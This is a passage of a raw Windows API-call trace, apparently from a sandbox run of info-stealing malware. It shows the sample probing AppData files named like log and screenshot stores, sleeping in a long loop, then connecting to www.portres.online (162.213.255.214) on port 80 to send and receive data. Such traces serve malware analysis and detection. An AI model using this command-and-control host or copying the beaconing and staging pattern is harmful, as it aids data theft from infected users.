NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.584] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.584] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0226.584] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0226.584] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.585] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.585] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0226.585] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06b30) returned 1 [0226.585] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.585] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.585] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0226.585] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06740) returned 1 [0226.585] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.585] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.585] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0226.585] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0226.585] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.585] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.585] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0226.585] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0226.585] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.585] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.586] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0226.586] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06740) returned 1 [0226.586] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.586] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.586] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0226.586] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06b30) returned 1 [0226.586] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.586] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.586] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0226.586] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07550) returned 1 [0226.586] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.586] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.586] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0226.586] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0226.586] Sleep (dwMilliseconds=0x7d0) [0226.589] Sleep (dwMilliseconds=0x7d0) [0226.590] Sleep (dwMilliseconds=0x7d0) [0226.596] Sleep (dwMilliseconds=0x7d0) [0226.597] Sleep (dwMilliseconds=0x7d0) [0226.599] Sleep (dwMilliseconds=0x7d0) [0226.604] Sleep (dwMilliseconds=0x7d0) [0226.606] Sleep (dwMilliseconds=0x7d0) [0226.608] Sleep (dwMilliseconds=0x7d0) [0226.609] Sleep (dwMilliseconds=0x7d0) [0226.611] Sleep (dwMilliseconds=0x7d0) [0226.616] Sleep (dwMilliseconds=0x7d0) [0226.617] Sleep (dwMilliseconds=0x7d0) [0226.621] Sleep (dwMilliseconds=0x7d0) [0226.631] Sleep (dwMilliseconds=0x7d0) [0226.633] Sleep (dwMilliseconds=0x7d0) [0226.634] Sleep (dwMilliseconds=0x7d0) [0226.637] Sleep (dwMilliseconds=0x7d0) [0226.639] Sleep (dwMilliseconds=0x7d0) [0226.640] Sleep (dwMilliseconds=0x7d0) [0226.642] Sleep (dwMilliseconds=0x7d0) [0226.643] Sleep (dwMilliseconds=0x7d0) [0226.649] Sleep (dwMilliseconds=0x7d0) [0226.651] Sleep (dwMilliseconds=0x7d0) [0226.652] Sleep (dwMilliseconds=0x7d0) [0226.653] Sleep (dwMilliseconds=0x7d0) [0226.655] Sleep (dwMilliseconds=0x7d0) [0226.662] Sleep (dwMilliseconds=0x7d0) [0226.664] Sleep (dwMilliseconds=0x7d0) [0226.665] Sleep (dwMilliseconds=0x7d0) [0226.667] Sleep (dwMilliseconds=0x7d0) [0226.669] Sleep (dwMilliseconds=0x7d0) [0226.670] Sleep (dwMilliseconds=0x7d0) [0226.672] Sleep (dwMilliseconds=0x7d0) [0226.683] Sleep (dwMilliseconds=0x7d0) [0226.684] Sleep (dwMilliseconds=0x7d0) [0226.686] Sleep (dwMilliseconds=0x7d0) [0226.689] Sleep (dwMilliseconds=0x7d0) [0226.694] Sleep (dwMilliseconds=0x7d0) [0226.696] Sleep (dwMilliseconds=0x7d0) [0226.697] Sleep (dwMilliseconds=0x7d0) [0226.699] Sleep (dwMilliseconds=0x7d0) [0226.705] Sleep (dwMilliseconds=0x7d0) [0226.707] Sleep (dwMilliseconds=0x7d0) [0226.709] Sleep (dwMilliseconds=0x7d0) [0226.710] Sleep (dwMilliseconds=0x7d0) [0226.712] Sleep (dwMilliseconds=0x7d0) [0226.713] Sleep (dwMilliseconds=0x7d0) [0226.715] Sleep (dwMilliseconds=0x7d0) [0226.716] Sleep (dwMilliseconds=0x7d0) [0226.718] Sleep (dwMilliseconds=0x7d0) [0226.719] Sleep (dwMilliseconds=0x7d0) [0226.721] Sleep (dwMilliseconds=0x7d0) [0226.725] Sleep (dwMilliseconds=0x7d0) [0226.727] Sleep (dwMilliseconds=0x7d0) [0226.728] Sleep (dwMilliseconds=0x7d0) [0226.730] Sleep (dwMilliseconds=0x7d0) [0226.731] Sleep (dwMilliseconds=0x7d0) [0226.736] Sleep (dwMilliseconds=0x7d0) [0226.738] Sleep (dwMilliseconds=0x7d0) [0226.739] Sleep (dwMilliseconds=0x7d0) [0226.741] Sleep (dwMilliseconds=0x7d0) [0226.742] Sleep (dwMilliseconds=0x7d0) [0226.747] Sleep (dwMilliseconds=0x7d0) [0226.748] Sleep (dwMilliseconds=0x7d0) [0226.750] Sleep (dwMilliseconds=0x7d0) [0226.751] Sleep (dwMilliseconds=0x7d0) [0226.753] Sleep (dwMilliseconds=0x7d0) [0226.754] Sleep (dwMilliseconds=0x7d0) [0226.756] Sleep (dwMilliseconds=0x7d0) [0226.757] Sleep (dwMilliseconds=0x7d0) [0226.759] Sleep (dwMilliseconds=0x7d0) [0226.761] Sleep (dwMilliseconds=0x7d0) [0226.762] Sleep (dwMilliseconds=0x7d0) [0226.765] Sleep (dwMilliseconds=0x7d0) [0226.770] Sleep (dwMilliseconds=0x7d0) [0226.772] Sleep (dwMilliseconds=0x7d0) [0226.773] Sleep (dwMilliseconds=0x7d0) [0226.776] Sleep (dwMilliseconds=0x7d0) [0226.781] Sleep (dwMilliseconds=0x7d0) [0226.783] Sleep (dwMilliseconds=0x7d0) [0226.785] Sleep (dwMilliseconds=0x7d0) [0226.786] Sleep (dwMilliseconds=0x7d0) [0226.791] Sleep (dwMilliseconds=0x7d0) [0226.793] Sleep (dwMilliseconds=0x7d0) [0226.794] Sleep (dwMilliseconds=0x7d0) [0226.796] Sleep (dwMilliseconds=0x7d0) [0226.797] Sleep (dwMilliseconds=0x7d0) [0226.799] Sleep (dwMilliseconds=0x7d0) [0226.800] Sleep (dwMilliseconds=0x7d0) [0226.802] Sleep (dwMilliseconds=0x7d0) [0226.803] Sleep (dwMilliseconds=0x7d0) [0226.805] Sleep (dwMilliseconds=0x7d0) [0226.806] Sleep (dwMilliseconds=0x7d0) [0226.808] Sleep (dwMilliseconds=0x7d0) [0226.814] Sleep (dwMilliseconds=0x7d0) [0226.815] Sleep (dwMilliseconds=0x7d0) [0226.817] Sleep (dwMilliseconds=0x7d0) [0226.819] Sleep (dwMilliseconds=0x7d0) [0226.824] Sleep (dwMilliseconds=0x7d0) [0226.826] Sleep (dwMilliseconds=0x7d0) [0226.827] Sleep (dwMilliseconds=0x7d0) [0226.829] Sleep (dwMilliseconds=0x7d0) [0226.830] Sleep (dwMilliseconds=0x7d0) [0226.832] Sleep (dwMilliseconds=0x7d0) [0226.837] Sleep (dwMilliseconds=0x7d0) [0226.839] Sleep (dwMilliseconds=0x7d0) [0226.840] Sleep (dwMilliseconds=0x7d0) [0226.842] Sleep (dwMilliseconds=0x7d0) [0226.844] Sleep (dwMilliseconds=0x7d0) [0226.845] Sleep (dwMilliseconds=0x7d0) [0226.847] Sleep (dwMilliseconds=0x7d0) [0226.849] Sleep (dwMilliseconds=0x7d0) [0226.850] Sleep (dwMilliseconds=0x7d0) [0226.852] Sleep (dwMilliseconds=0x7d0) [0226.853] Sleep (dwMilliseconds=0x7d0) [0226.859] Sleep (dwMilliseconds=0x7d0) [0226.862] Sleep (dwMilliseconds=0x7d0) [0226.864] Sleep (dwMilliseconds=0x7d0) [0226.869] Sleep (dwMilliseconds=0x7d0) [0226.870] Sleep (dwMilliseconds=0x7d0) [0226.872] Sleep (dwMilliseconds=0x7d0) [0226.873] Sleep (dwMilliseconds=0x7d0) [0226.905] Sleep (dwMilliseconds=0x7d0) [0226.926] Sleep (dwMilliseconds=0x7d0) [0226.983] Sleep (dwMilliseconds=0x7d0) [0227.090] Sleep (dwMilliseconds=0x7d0) [0227.175] Sleep (dwMilliseconds=0x7d0) [0227.220] Sleep (dwMilliseconds=0x7d0) [0227.236] Sleep (dwMilliseconds=0x7d0) [0227.285] Sleep (dwMilliseconds=0x7d0) [0227.348] Sleep (dwMilliseconds=0x7d0) [0227.402] Sleep (dwMilliseconds=0x7d0) [0227.413] Sleep (dwMilliseconds=0x7d0) [0227.457] Sleep (dwMilliseconds=0x7d0) [0227.509] Sleep (dwMilliseconds=0x7d0) [0227.561] Sleep (dwMilliseconds=0x7d0) [0227.604] Sleep (dwMilliseconds=0x7d0) [0227.649] socket (af=2, type=1, protocol=6) returned 0x1c54 [0227.649] getaddrinfo (in: pNodeName="www.portres.online", pServiceName="80", pHints=0x9e78178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e781a8 | out: ppResult=0x9e781a8*=0xa05e3d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f91930*(sa_family=2, sin_port=0x50, sin_addr="162.213.255.214"), ai_next=0x0)) returned 0 [0227.754] connect (s=0x1c54, name=0x9f91930*(sa_family=2, sin_port=0x50, sin_addr="162.213.255.214"), namelen=16) returned 0 [0227.926] send (s=0x1c54, buf=0x82e10fa*, len=168, flags=0) returned 168 [0227.926] Sleep (dwMilliseconds=0x1f4) [0227.928] setsockopt (s=0x1c54, level=65535, optname=4102, optval="¸\x0b", optlen=4) returned 0 [0227.928] recv (in: s=0x1c54, buf=0x120e7440, len=2048000, flags=0 | out: buf=0x120e7440*) returned 460 [0228.219] recv (in: s=0x1c54, buf=0x120e760c, len=2047540, flags=0 | out: buf=0x120e760c) returned 0 [0228.219] closesocket (s=0x1c54) returned 0 [0228.220] Sleep (dwMilliseconds=0x7d0) [0228.223] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.223] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.223] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0228.223] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.223] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.223] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.223] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0228.223] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.224] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.224] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.224] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0228.224] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.224] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.224] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.224] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0228.224] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.224] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.224] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.225] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0228.225] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.225] 